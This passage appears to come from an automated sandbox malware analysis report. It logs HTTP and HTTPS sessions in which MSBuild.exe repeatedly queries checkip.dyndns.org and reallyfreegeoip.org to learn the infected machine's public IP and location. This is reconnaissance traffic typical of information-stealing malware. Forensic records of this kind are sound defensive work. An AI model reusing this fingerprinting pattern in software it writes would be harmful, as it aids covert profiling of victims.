Nov 7, 2024 12:49:08.644323111 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:08 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e753f3b8a8ac2fc68eb8121ec2c1f962 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
Nov 7, 2024 12:49:08.648875952 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 7, 2024 12:49:08.797954082 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:08 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9458aebc856938d6f0cfeb0b612ca001 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
Nov 7, 2024 12:49:10.022247076 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 7, 2024 12:49:10.184925079 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:10 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5a684743ac1216acbd0f53845c22fe6e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49717	158.101.44.242	80	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 12:49:10.976272106 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 7, 2024 12:49:11.606470108 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:11 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e63e2839eaa3b0dd8c2cfcde6d1f1624 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.12	49720	158.101.44.242	80	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 12:49:12.355129004 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 7, 2024 12:49:13.009958029 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:12 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 502178a71e96a49f32240103383d8952 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.12	49723	158.101.44.242	80	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 12:49:13.773189068 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 7, 2024 12:49:14.423204899 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:14 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e24e939d513825c5455bbde419cb98ae Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.12	49725	158.101.44.242	80	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 12:49:15.197859049 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 7, 2024 12:49:15.875992060 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:15 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e80c05e5acd92e1e67d9b983cb4b54a6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.12	49727	158.101.44.242	80	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 12:49:17.052427053 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 7, 2024 12:49:17.709129095 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:17 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5cf174e8852c358234b31774edddbcd1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.12	49729	158.101.44.242	80	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 12:49:18.481693983 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 7, 2024 12:49:19.117049932 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:19 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 53248497a6ff0db8c80f34f8b77b59b2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.12	49731	158.101.44.242	80	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 12:49:19.874064922 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 7, 2024 12:49:20.514695883 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 956f096ed4c394cd5ff64d65957d8b4f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49714	188.114.96.3	443	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 11:49:09 UTC	87	OUT	GET /xml/173.254.250.79 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-07 11:49:09 UTC	1215	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:09 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38 x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 23327 Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JC93UbYrRHHtK5lVmt4qE2uL2ixvrbHrGDDzkGL24Rx6E5KSHHFGDVVApx6xIzw4wO14bU1qENSszAsrZz%2BHqi7b2%2BSGu3hiXAjE6bJyjUClkiJslXGa6dUU1EoRhaqySQHFTy7a"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded19301d9fe76a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1048&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2691449&cwnd=242&unsent_bytes=0&cid=7bcb5e7f1991828a&ts=346&x=0"
2024-11-07 11:49:09 UTC	154	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
2024-11-07 11:49:09 UTC	205	IN	Data Raw: 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: as</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49716	188.114.96.3	443	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 11:49:10 UTC	63	OUT	GET /xml/173.254.250.79 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-07 11:49:10 UTC	1221	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:10 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38 x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 23328 Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RgOUZgMdEn2BOrFi5Do5t3%2F0EoSUN4OhNxHKCf7WyMLA5Bq2V0u69pYmhK3COCqAt6cCtpCQawyOm%2FLizynsE9iMPck93Y7s6lToaW7mbYQZmLNEWH8%2F3eS1%2BRu9aGz%2FLPr2NpaU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded19370dac478b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1181&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2335483&cwnd=251&unsent_bytes=0&cid=a89cd2ac44498350&ts=153&x=0"
2024-11-07 11:49:10 UTC	148	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
2024-11-07 11:49:10 UTC	211	IN	Data Raw: 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.12	49719	188.114.96.3	443	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 11:49:12 UTC	87	OUT	GET /xml/173.254.250.79 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-07 11:49:12 UTC	1223	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:12 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38 x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 23330 Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vY2JE1vm4IuB%2BSwXGJj%2BDUh6SsdjcNvKetOYZzcF3wOnKzDX0ZiDwwO%2FHcUYJt1aNh2QgDrc9ITDZpQW4i8tqdAv4LwsxC7OUEYAQxJNv0zM92F4KtBWf%2BJbO%2FB0KWJ%2FPEBq2Fgy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded193fa9c046a1-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1923&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1505980&cwnd=251&unsent_bytes=0&cid=31d1862ef0a69773&ts=143&x=0"
2024-11-07 11:49:12 UTC	146	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
2024-11-07 11:49:12 UTC	213	IN	Data Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.12	49722	188.114.96.3	443	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 11:49:13 UTC	87	OUT	GET /xml/173.254.250.79 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-07 11:49:13 UTC	1223	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 11:49:13 GMT Content-Type: text/xml Content-Length: 359 Connection: close x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38 x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0 x-cache: Miss from cloudfront via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront) x-amz-cf-pop: DFW57-P5 x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w== Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 23331 Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hP9Qc2MN%2FSZp%2FjD10%2BAn%2Bm3rdCFapmWeWVdCQe%2BYLqjuhiIN7ENk0B401GVwYmS5lPxtxe7f8HruMDB8QNwpzVONgTv2rKYVfN9rwSdVCSRWRKh5WfPSjgQGzMFUjw0sUyx9Amo%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ded19488998485d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1182&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2976361&cwnd=251&unsent_bytes=0&cid=69b2f82141e196e4&ts=148&x=0"
2024-11-07 11:49:13 UTC	146	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Region
2024-11-07 11:49:13 UTC	213	IN	Data Raw: 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a Data Ascii: Name>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.12	49724	188.114.96.3	443	1016	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
